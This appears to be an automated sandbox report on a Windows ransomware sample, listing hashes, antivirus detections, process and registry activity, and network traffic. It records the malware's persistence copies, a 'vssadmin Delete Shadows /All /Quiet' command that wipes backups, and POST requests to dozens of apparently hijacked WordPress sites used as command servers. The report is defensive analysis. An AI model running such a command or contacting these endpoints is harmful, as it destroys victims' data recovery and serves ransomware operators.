Analysis Date: 2015-10-05 07:48:31
MD5: f892b07591a50f755c15e45e0b39a835
SHA1: 400c6ae5f052d51663e3b3c89be24d530656e8ca

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 83ebf5c11e7ab01903916461f212a125 sha1: b0f5c7c2b3c19edbaaa4f4d2611a81512f96fdd1 size: 138240
Section .rdata: md5: 46f744fe3d283eece66c09331dc02845 sha1: ebb87dc688c7c130ab2eba84664578beb95d646b size: 12288
Section .data: md5: 37cac6f7c29fdc54e43f40f40f63979f sha1: 792643304be4bdb71b2004070c481b878febcd15 size: 25600
Section .rsrc: md5: ed0550e91f022c1bab9621dfb794878f sha1: e925dbd4e9b1e196ed6aea60c3e126ea25f3200f size: 94720
Timestamp: 2015-09-17 08:32:55
Packer: Microsoft Visual C++ ?.?
PEhash: 810f59f62996622ea92b2dea1bd42cf29f8fac1e
IMPhash: d923ac30ec7bd69824538354f5bc31e7
AV Rising: no_virus
AV Mcafee: no_virus
AV Avira (antivir): no_virus
AV Twister: no_virus
AV Ad-Aware: Gen:Variant.Zusy.162361
AV Alwil (avast): no_virus
AV Eset (nod32): Win32/Kryptik.DYCV
AV Grisoft (avg): Crypt_r.TI
AV Symantec: no_virus
AV Fortinet: W32/Injector.CIUZ!tr
AV BitDefender: Gen:Variant.Zusy.162361
AV K7: Trojan ( 004ce5441 )
AV Microsoft Security Essentials: Worm:Win32/Gamarue.AU
AV MicroWorld (escan): Gen:Variant.Zusy.162361
AV MalwareBytes: Ransom.Winlock
AV Authentium: W32/Agent.XL.gen!Eldorado
AV Frisk (f-prot): no_virus
AV Ikarus: no_virus
AV Emsisoft: Gen:Variant.Zusy.162361
AV Zillya!: no_virus
AV Kaspersky: Trojan-Ransom.Win32.Cryptodef.yun
AV Trend Micro: no_virus
AV CAT (quickheal): no_virus
AV VirusBlokAda (vba32): no_virus
AV Padvish: no_virus
AV BullGuard: Gen:Variant.Zusy.162361
AV Arcabit (arcavir): Gen:Variant.Zusy.162361
AV ClamAV: no_virus
AV Dr. Web: Trojan.DownLoader16.31313
AV F-Secure: Gen:Variant.Zusy.162361
AV CA (E-Trust Ino): no_virus

Runtime Details:

Process
↳ C:\malware.exe

Creates Process: C:\WINDOWS\explorer.exe

Process
↳ C:\WINDOWS\explorer.exe

Creates File: C:\Documents and Settings\Administrator\Start Menu\Programs\Startup\6ff06165.exe
Creates File: C:\6ff06165\6ff06165.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\6ff06165.exe
Creates Process: vssadmin.exe Delete Shadows /All /Quiet
Creates Process: -k netsvcs

Process
↳ -k netsvcs

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ NULL
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass ➝ 1
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: eugeniobonato.com
Winsock DNS: evolvingcareers.co.uk
Winsock DNS: glamkey.com
Winsock DNS: eshraqatee.com
Winsock DNS: fundmymission.org
Winsock DNS: focusmusicktv.com
Winsock DNS: hhydrovac.ca
Winsock DNS: fan-out.com
Winsock DNS: curlmyip.com
Winsock DNS: gosmarttec.com
Winsock DNS: effectpublications.com
Winsock DNS: dr4greatsmiles.com
Winsock DNS: foundersomaha.net
Winsock DNS: geopowercables.com
Winsock DNS: fabconcepts.net
Winsock DNS: eastriverpartners.org
Winsock DNS: myexternalip.com
Winsock DNS: erointernet.com
Winsock DNS: ftpsecurityservices.com
Winsock DNS: elitefitnessproduct.com
Winsock DNS: doodkonijn.com
Winsock DNS: fiiwin.com
Winsock DNS: epslegal.co.uk
Winsock DNS: fenonsilver.com
Winsock DNS: ip-addr.es
Winsock DNS: entriflex.com
Winsock DNS: enyinnaerengwa.com
Winsock DNS: fortunesolutions.co.in
Winsock DNS: ewineco.com
Winsock DNS: europe-academy.net
Winsock DNS: externalbatterycase.com
Winsock DNS: drsrusso.com
Winsock DNS: georgiainjurycenters.com
Winsock DNS: freepolyclinic.com
Winsock DNS: essayspro.com
Winsock DNS: employance.com
Winsock DNS: dulichmuadong.com
Winsock DNS: g6securitysystems.com
Winsock DNS: forwriteabouteverything.com
Winsock DNS: giorgioparquettes.com
Winsock DNS: emceebook.com
Winsock DNS: hagginhosp.com
Winsock DNS: eliasgreencondo.com
Winsock DNS: h3inmotion.com
Winsock DNS: fontainebleau-miami.com
Winsock DNS: fondazioneciampi.org
Winsock DNS: drrebeccafountain.com
Winsock DNS: hanjou-kanban.net
Winsock DNS: gembeauty.net
Winsock DNS: fiftyschmifty.com
Winsock DNS: ggal.com.ng
Winsock DNS: greenevap.com
Winsock DNS: essayhub.org
Winsock DNS: gaiga.net

Process
↳ vssadmin.exe Delete Shadows /All /Quiet

Creates File: PIPE\lsarpc

Network Details:

DNS: ip-addr.es (Type: A) ➝ 188.165.164.184
DNS: myexternalip.com (Type: A) ➝ 78.47.139.102
DNS: curlmyip.com (Type: A) ➝ 184.106.112.172
DNS: effectpublications.com (Type: A) ➝ 166.62.12.1
DNS: glamkey.com (Type: A) ➝ 23.229.142.166
DNS: giorgioparquettes.com (Type: A) ➝ 107.180.1.233
DNS: fiiwin.com (Type: A) ➝ 192.254.189.83
DNS: eliasgreencondo.com (Type: A) ➝ 23.229.143.32
DNS: fiftyschmifty.com (Type: A) ➝ 66.33.213.135
DNS: hagginhosp.com (Type: A) ➝ 184.168.26.1
DNS: freepolyclinic.com (Type: A) ➝ 166.62.28.84
DNS: fabconcepts.net (Type: A) ➝ 107.180.4.133
DNS: evolvingcareers.co.uk (Type: A) ➝ 188.121.47.1
DNS: enyinnaerengwa.com (Type: A) ➝ 50.63.90.1
DNS: erointernet.com (Type: A) ➝ 68.178.254.208
DNS: fondazioneciampi.org (Type: A) ➝ 66.36.163.207
DNS: fortunesolutions.co.in (Type: A) ➝ 103.21.58.231
DNS: emceebook.com (Type: A) ➝ 23.229.183.231
DNS: ggal.com.ng (Type: A) ➝ 52.88.9.255
DNS: entriflex.com (Type: A) ➝ 52.88.9.255
DNS: fenonsilver.com (Type: A) ➝ 192.232.249.212
DNS: doodkonijn.com (Type: A) ➝ 46.252.201.1
DNS: fan-out.com (Type: A) ➝ 50.62.245.1
DNS: hhydrovac.ca (Type: A) ➝ 50.63.202.57
DNS: gaiga.net (Type: A) ➝ 186.202.153.84
DNS: employance.com (Type: A) ➝ 173.201.1.1
DNS: hanjou-kanban.net (Type: A) ➝ 157.7.144.5
DNS: epslegal.co.uk (Type: A) ➝ 188.121.47.1
DNS: gembeauty.net (Type: A) ➝ 85.92.75.157
DNS: essayspro.com (Type: A) ➝ 74.124.204.146
DNS: geopowercables.com (Type: A) ➝ 107.180.44.125
DNS: g6securitysystems.com (Type: A) ➝ 188.121.47.1
DNS: europe-academy.net (Type: A) ➝ 217.174.149.3
DNS: eugeniobonato.com (Type: A) ➝ 95.110.202.149
DNS: dr4greatsmiles.com (Type: A) ➝ 173.254.28.111
DNS: eastriverpartners.org (Type: A) ➝ 50.62.160.231
DNS: essayhub.org (Type: A) ➝ 74.124.204.146
DNS: externalbatterycase.com (Type: A) ➝ 192.186.222.229
DNS: drrebeccafountain.com (Type: A) ➝ 184.168.25.1
DNS: fundmymission.org (Type: A) ➝ 184.168.221.44
DNS: h3inmotion.com (Type: A) ➝ 182.50.135.128
DNS: dulichmuadong.com (Type: A) ➝ 182.50.134.1
DNS: fontainebleau-miami.com (Type: A) ➝ 68.178.254.208
DNS: eshraqatee.com (Type: A) ➝ 107.180.4.26
DNS: greenevap.com (Type: A) ➝ 50.63.95.1
DNS: elitefitnessproduct.com (Type: A) ➝ 192.186.222.229
DNS: drsrusso.com (Type: A) ➝ 97.74.215.85
DNS: ewineco.com (Type: A) ➝ 192.186.235.6
DNS: foundersomaha.net (Type: A) ➝ 50.63.42.1
DNS: focusmusicktv.com (Type: A) ➝ 23.229.209.230
DNS: gosmarttec.com (Type: A) ➝ 192.232.249.212
DNS: georgiainjurycenters.com (Type: A) ➝ 184.168.19.1
DNS: forwriteabouteverything.com (Type: A) ➝ 107.180.2.132
DNS: ftpsecurityservices.com (Type: A) ➝ 107.180.26.90
User-Agent (identical on every HTTP request below): Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
HTTP GET: http://ip-addr.es/
HTTP GET: http://myexternalip.com/raw
HTTP GET: http://curlmyip.com/
HTTP POST: http://effectpublications.com/wp-includes/theme-compat/ap1.php?f=ri641i2oi582f1g
HTTP POST: http://glamkey.com/errors/default/css/ap2.php?d=ri641i2oi582f1g
HTTP POST: http://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?q=ri641i2oi582f1g
HTTP POST: http://fiiwin.com/wp-admin/maint/ap4.php?j=ri641i2oi582f1g
HTTP POST: http://eliasgreencondo.com/wp-content/cache/ap4.php?z=ri641i2oi582f1g
HTTP POST: http://fiftyschmifty.com/ap1.php?q=ri641i2oi582f1g
HTTP POST: http://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?f=ri641i2oi582f1g
HTTP POST: http://freepolyclinic.com/gallery/small/ap1.php?a=ri641i2oi582f1g
HTTP POST: http://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?x=ri641i2oi582f1g
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?p=ri641i2oi582f1g
HTTP POST: http://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?g=ri641i2oi582f1g
HTTP POST: http://erointernet.com/ap2.php?q=ri641i2oi582f1g
HTTP POST: http://fondazioneciampi.org/nuovo/blogs/media/ap2.php?q=ri641i2oi582f1g
HTTP POST: http://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?m=ri641i2oi582f1g
HTTP POST: http://emceebook.com/bat/ap1.php?v=ri641i2oi582f1g
HTTP POST: http://ggal.com.ng/js/vendor/ap5.php?c=ri641i2oi582f1g
HTTP POST: http://entriflex.com/ndst.ng/wp-admin/images/ap5.php?x=ri641i2oi582f1g
HTTP POST: http://fenonsilver.com/controller/catalog/ap2.php?r=ri641i2oi582f1g
HTTP POST: http://doodkonijn.com/wp-includes/theme-compat/ap1.php?q=ri641i2oi582f1g
HTTP POST: http://fan-out.com/wp-includes/fonts/ap5.php?h=ri641i2oi582f1g
HTTP POST: http://hhydrovac.ca/ap1.php?i=ri641i2oi582f1g
HTTP POST: http://gaiga.net/wp-admin/js/ap3.php?d=ri641i2oi582f1g
HTTP POST: http://employance.com/wp-includes/theme-compat/ap2.php?j=ri641i2oi582f1g
HTTP POST: http://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?o=ri641i2oi582f1g
HTTP POST: http://epslegal.co.uk/js-js/ap4.php?l=ri641i2oi582f1g
HTTP POST: http://gembeauty.net/wp-includes/certificates/ap2.php?f=ri641i2oi582f1g
HTTP POST: http://essayspro.com/css/fonts/ap4.php?a=ri641i2oi582f1g
HTTP POST: http://geopowercables.com/wp-admin/user/ap1.php?n=ri641i2oi582f1g
HTTP POST: http://g6securitysystems.com/js/ap4.php?u=ri641i2oi582f1g
HTTP POST: http://europe-academy.net/wp-admin/user/ap2.php?i=ri641i2oi582f1g
HTTP POST: http://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?v=ri641i2oi582f1g
HTTP POST: http://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?e=ri641i2oi582f1g
HTTP POST: http://eastriverpartners.org/wp-includes/theme-compat/ap5.php?l=ri641i2oi582f1g
HTTP POST: http://essayhub.org/css/fonts/ap5.php?c=ri641i2oi582f1g
HTTP POST: http://externalbatterycase.com/wp-admin/js/ap4.php?q=ri641i2oi582f1g
HTTP POST: http://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?p=ri641i2oi582f1g
HTTP POST: http://fundmymission.org/wp-includes/theme-compat/ap5.php?s=ri641i2oi582f1g
HTTP POST: http://h3inmotion.com/ap4.php?c=ri641i2oi582f1g
HTTP POST: http://dulichmuadong.com/wp-includes/fonts/ap2.php?m=ri641i2oi582f1g
HTTP POST: http://fontainebleau-miami.com/ap1.php?i=ri641i2oi582f1g
HTTP POST: http://eshraqatee.com/wp-includes/css/ap1.php?c=ri641i2oi582f1g
HTTP POST: http://greenevap.com/mtqzpa/templates/ap5.php?u=ri641i2oi582f1g
HTTP POST: http://elitefitnessproduct.com/wp-admin/js/ap3.php?w=ri641i2oi582f1g
HTTP POST: http://drsrusso.com/mtqzpa/templates/ap4.php?h=ri641i2oi582f1g
HTTP POST: http://ewineco.com/wp-admin/network/ap5.php?n=ri641i2oi582f1g
HTTP POST: http://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?f=ri641i2oi582f1g
HTTP POST: http://focusmusicktv.com/ap3.php?l=ri641i2oi582f1g
HTTP POST: http://gosmarttec.com/assets/fonts/ap1.php?d=ri641i2oi582f1g
HTTP POST: http://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?j=ri641i2oi582f1g
HTTP POST: http://forwriteabouteverything.com/wp-includes/pomo/ap4.php?s=ri641i2oi582f1g
HTTP POST: http://ftpsecurityservices.com/wp-admin/images/ap2.php?k=ri641i2oi582f1g
HTTP GET: http://ip-addr.es/
HTTP GET: http://myexternalip.com/raw
HTTP GET: http://curlmyip.com/
HTTP POST: http://effectpublications.com/wp-includes/theme-compat/ap1.php?m=a4f8sbgx94
HTTP POST: http://glamkey.com/errors/default/css/ap2.php?t=a4f8sbgx94
HTTP POST: http://giorgioparquettes.com/wp-content/uploads/2014/07/ap3.php?w=a4f8sbgx94
HTTP POST: http://fiiwin.com/wp-admin/maint/ap4.php?t=a4f8sbgx94
HTTP POST: http://eliasgreencondo.com/wp-content/cache/ap4.php?o=a4f8sbgx94
HTTP POST: http://fiftyschmifty.com/ap1.php?q=a4f8sbgx94
HTTP POST: http://hagginhosp.com/hagg2013/wp-includes/theme-compat/ap3.php?a=a4f8sbgx94
HTTP POST: http://freepolyclinic.com/gallery/small/ap1.php?s=a4f8sbgx94
HTTP POST: http://fabconcepts.net/wp-content/plugins/indonez-shortcodes/js/ap3.php?z=a4f8sbgx94
HTTP POST: http://evolvingcareers.co.uk/images/prettyPhoto/light_square/ap1.php?q=a4f8sbgx94
HTTP POST: http://enyinnaerengwa.com/user/most-instagram-followers-non-celebrity/ap3.php?k=a4f8sbgx94
HTTP POST: http://erointernet.com/ap2.php?n=a4f8sbgx94
HTTP POST: http://fondazioneciampi.org/nuovo/blogs/media/ap2.php?g=a4f8sbgx94
HTTP POST: http://fortunesolutions.co.in/wp-content/plugins/tinymce-advanced/css/ap5.php?o=a4f8sbgx94
HTTP POST: http://emceebook.com/bat/ap1.php?f=a4f8sbgx94
HTTP POST: http://ggal.com.ng/js/vendor/ap5.php?y=a4f8sbgx94
HTTP POST: http://entriflex.com/ndst.ng/wp-admin/images/ap5.php?w=a4f8sbgx94
HTTP POST: http://fenonsilver.com/controller/catalog/ap2.php?d=a4f8sbgx94
HTTP POST: http://doodkonijn.com/wp-includes/theme-compat/ap1.php?f=a4f8sbgx94
HTTP POST: http://fan-out.com/wp-includes/fonts/ap5.php?q=a4f8sbgx94
HTTP POST: http://hhydrovac.ca/ap1.php?c=a4f8sbgx94
HTTP POST: http://gaiga.net/wp-admin/js/ap3.php?b=a4f8sbgx94
HTTP POST: http://employance.com/wp-includes/theme-compat/ap2.php?r=a4f8sbgx94
HTTP POST: http://hanjou-kanban.net/wordpress/wp-content/plugins/akismet/_inc/img/ap2.php?r=a4f8sbgx94
HTTP POST: http://epslegal.co.uk/js-js/ap4.php?d=a4f8sbgx94
HTTP POST: http://gembeauty.net/wp-includes/certificates/ap2.php?p=a4f8sbgx94
HTTP POST: http://essayspro.com/css/fonts/ap4.php?i=a4f8sbgx94
HTTP POST: http://geopowercables.com/wp-admin/user/ap1.php?z=a4f8sbgx94
HTTP POST: http://g6securitysystems.com/js/ap4.php?o=a4f8sbgx94
HTTP POST: http://europe-academy.net/wp-admin/user/ap2.php?i=a4f8sbgx94
HTTP POST: http://eugeniobonato.com/wp-content/uploads/js_composer/ap3.php?f=a4f8sbgx94
HTTP POST: http://dr4greatsmiles.com/old/wp-includes/theme-compat/ap3.php?o=a4f8sbgx94
HTTP POST: http://eastriverpartners.org/wp-includes/theme-compat/ap5.php?w=a4f8sbgx94
HTTP POST: http://essayhub.org/css/fonts/ap5.php?b=a4f8sbgx94
HTTP POST: http://externalbatterycase.com/wp-admin/js/ap4.php?l=a4f8sbgx94
HTTP POST: http://drrebeccafountain.com/Saffron/wp-content/themes/medica-lite/ap5.php?c=a4f8sbgx94
HTTP POST: http://fundmymission.org/wp-includes/theme-compat/ap5.php?p=a4f8sbgx94
HTTP POST: http://h3inmotion.com/ap4.php?b=a4f8sbgx94
HTTP POST: http://dulichmuadong.com/wp-includes/fonts/ap2.php?j=a4f8sbgx94
HTTP POST: http://fontainebleau-miami.com/ap1.php?u=a4f8sbgx94
HTTP POST: http://eshraqatee.com/wp-includes/css/ap1.php?d=a4f8sbgx94
HTTP POST: http://greenevap.com/mtqzpa/templates/ap5.php?l=a4f8sbgx94
HTTP POST: http://elitefitnessproduct.com/wp-admin/js/ap3.php?n=a4f8sbgx94
HTTP POST: http://drsrusso.com/mtqzpa/templates/ap4.php?m=a4f8sbgx94
HTTP POST: http://ewineco.com/wp-admin/network/ap5.php?w=a4f8sbgx94
HTTP POST: http://foundersomaha.net/wp-includes/Text/Diff/Renderer/ap3.php?d=a4f8sbgx94
HTTP POST: http://focusmusicktv.com/ap3.php?r=a4f8sbgx94
HTTP POST: http://gosmarttec.com/assets/fonts/ap1.php?y=a4f8sbgx94
HTTP POST: http://georgiainjurycenters.com/backups_georgia/back%2007102014/ap4.php?p=a4f8sbgx94
HTTP POST: http://forwriteabouteverything.com/wp-includes/pomo/ap4.php?p=a4f8sbgx94
HTTP POST: http://ftpsecurityservices.com/wp-admin/images/ap2.php?d=a4f8sbgx94
Flows TCP: 192.168.1.1:1031 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1032 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1033 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1034 ➝ 166.62.12.1:80
Flows TCP: 192.168.1.1:1035 ➝ 23.229.142.166:80
Flows TCP: 192.168.1.1:1036 ➝ 107.180.1.233:80
Flows TCP: 192.168.1.1:1037 ➝ 192.254.189.83:80
Flows TCP: 192.168.1.1:1038 ➝ 23.229.143.32:80
Flows TCP: 192.168.1.1:1039 ➝ 66.33.213.135:80
Flows TCP: 192.168.1.1:1040 ➝ 184.168.26.1:80
Flows TCP: 192.168.1.1:1041 ➝ 166.62.28.84:80
Flows TCP: 192.168.1.1:1042 ➝ 107.180.4.133:80
Flows TCP: 192.168.1.1:1043 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1044 ➝ 50.63.90.1:80
Flows TCP: 192.168.1.1:1045 ➝ 68.178.254.208:80
Flows TCP: 192.168.1.1:1046 ➝ 66.36.163.207:80
Flows TCP: 192.168.1.1:1047 ➝ 103.21.58.231:80
Flows TCP: 192.168.1.1:1048 ➝ 23.229.183.231:80
Flows TCP: 192.168.1.1:1049 ➝ 52.88.9.255:80
Flows TCP: 192.168.1.1:1050 ➝ 52.88.9.255:80
Flows TCP: 192.168.1.1:1051 ➝ 192.232.249.212:80
Flows TCP: 192.168.1.1:1052 ➝ 46.252.201.1:80
Flows TCP: 192.168.1.1:1053 ➝ 50.62.245.1:80
Flows TCP: 192.168.1.1:1054 ➝ 50.63.202.57:80
Flows TCP: 192.168.1.1:1055 ➝ 186.202.153.84:80
Flows TCP: 192.168.1.1:1056 ➝ 173.201.1.1:80
Flows TCP: 192.168.1.1:1057 ➝ 157.7.144.5:80
Flows TCP: 192.168.1.1:1058 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1059 ➝ 85.92.75.157:80
Flows TCP: 192.168.1.1:1060 ➝ 74.124.204.146:80
Flows TCP: 192.168.1.1:1061 ➝ 107.180.44.125:80
Flows TCP: 192.168.1.1:1062 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1063 ➝ 217.174.149.3:80
Flows TCP: 192.168.1.1:1064 ➝ 95.110.202.149:80
Flows TCP: 192.168.1.1:1065 ➝ 173.254.28.111:80
Flows TCP: 192.168.1.1:1066 ➝ 50.62.160.231:80
Flows TCP: 192.168.1.1:1067 ➝ 74.124.204.146:80
Flows TCP: 192.168.1.1:1068 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1069 ➝ 184.168.25.1:80
Flows TCP: 192.168.1.1:1070 ➝ 184.168.221.44:80
Flows TCP: 192.168.1.1:1071 ➝ 182.50.135.128:80
Flows TCP: 192.168.1.1:1072 ➝ 182.50.134.1:80
Flows TCP: 192.168.1.1:1073 ➝ 68.178.254.208:80
Flows TCP: 192.168.1.1:1074 ➝ 107.180.4.26:80
Flows TCP: 192.168.1.1:1075 ➝ 50.63.95.1:80
Flows TCP: 192.168.1.1:1076 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1077 ➝ 97.74.215.85:80
Flows TCP: 192.168.1.1:1078 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1079 ➝ 50.63.42.1:80
Flows TCP: 192.168.1.1:1080 ➝ 23.229.209.230:80
Flows TCP: 192.168.1.1:1081 ➝ 192.232.249.212:80
Flows TCP: 192.168.1.1:1082 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1083 ➝ 107.180.2.132:80
Flows TCP: 192.168.1.1:1084 ➝ 107.180.26.90:80
Flows TCP: 192.168.1.1:1085 ➝ 188.165.164.184:80
Flows TCP: 192.168.1.1:1086 ➝ 78.47.139.102:80
Flows TCP: 192.168.1.1:1087 ➝ 184.106.112.172:80
Flows TCP: 192.168.1.1:1088 ➝ 166.62.12.1:80
Flows TCP: 192.168.1.1:1089 ➝ 23.229.142.166:80
Flows TCP: 192.168.1.1:1090 ➝ 107.180.1.233:80
Flows TCP: 192.168.1.1:1091 ➝ 192.254.189.83:80
Flows TCP: 192.168.1.1:1092 ➝ 23.229.143.32:80
Flows TCP: 192.168.1.1:1093 ➝ 66.33.213.135:80
Flows TCP: 192.168.1.1:1094 ➝ 184.168.26.1:80
Flows TCP: 192.168.1.1:1095 ➝ 166.62.28.84:80
Flows TCP: 192.168.1.1:1096 ➝ 107.180.4.133:80
Flows TCP: 192.168.1.1:1097 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1098 ➝ 50.63.90.1:80
Flows TCP: 192.168.1.1:1099 ➝ 68.178.254.208:80
Flows TCP: 192.168.1.1:1100 ➝ 66.36.163.207:80
Flows TCP: 192.168.1.1:1101 ➝ 103.21.58.231:80
Flows TCP: 192.168.1.1:1102 ➝ 23.229.183.231:80
Flows TCP: 192.168.1.1:1103 ➝ 52.88.9.255:80
Flows TCP: 192.168.1.1:1104 ➝ 52.88.9.255:80
Flows TCP: 192.168.1.1:1105 ➝ 192.232.249.212:80
Flows TCP: 192.168.1.1:1106 ➝ 46.252.201.1:80
Flows TCP: 192.168.1.1:1107 ➝ 50.62.245.1:80
Flows TCP: 192.168.1.1:1108 ➝ 50.63.202.57:80
Flows TCP: 192.168.1.1:1109 ➝ 186.202.153.84:80
Flows TCP: 192.168.1.1:1110 ➝ 173.201.1.1:80
Flows TCP: 192.168.1.1:1111 ➝ 157.7.144.5:80
Flows TCP: 192.168.1.1:1112 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1113 ➝ 85.92.75.157:80
Flows TCP: 192.168.1.1:1114 ➝ 74.124.204.146:80
Flows TCP: 192.168.1.1:1115 ➝ 107.180.44.125:80
Flows TCP: 192.168.1.1:1116 ➝ 188.121.47.1:80
Flows TCP: 192.168.1.1:1117 ➝ 217.174.149.3:80
Flows TCP: 192.168.1.1:1118 ➝ 95.110.202.149:80
Flows TCP: 192.168.1.1:1119 ➝ 173.254.28.111:80
Flows TCP: 192.168.1.1:1120 ➝ 50.62.160.231:80
Flows TCP: 192.168.1.1:1121 ➝ 74.124.204.146:80
Flows TCP: 192.168.1.1:1122 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1123 ➝ 184.168.25.1:80
Flows TCP: 192.168.1.1:1124 ➝ 184.168.221.44:80
Flows TCP: 192.168.1.1:1125 ➝ 182.50.135.128:80
Flows TCP: 192.168.1.1:1126 ➝ 182.50.134.1:80
Flows TCP: 192.168.1.1:1127 ➝ 68.178.254.208:80
Flows TCP: 192.168.1.1:1128 ➝ 107.180.4.26:80
Flows TCP: 192.168.1.1:1129 ➝ 50.63.95.1:80
Flows TCP: 192.168.1.1:1130 ➝ 192.186.222.229:80
Flows TCP: 192.168.1.1:1131 ➝ 97.74.215.85:80
Flows TCP: 192.168.1.1:1132 ➝ 192.186.235.6:80
Flows TCP: 192.168.1.1:1133 ➝ 50.63.42.1:80
Flows TCP: 192.168.1.1:1134 ➝ 23.229.209.230:80
Flows TCP: 192.168.1.1:1135 ➝ 192.232.249.212:80
Flows TCP: 192.168.1.1:1136 ➝ 184.168.19.1:80
Flows TCP: 192.168.1.1:1137 ➝ 107.180.2.132:80
Flows TCP: 192.168.1.1:1138 ➝ 107.180.26.90:80
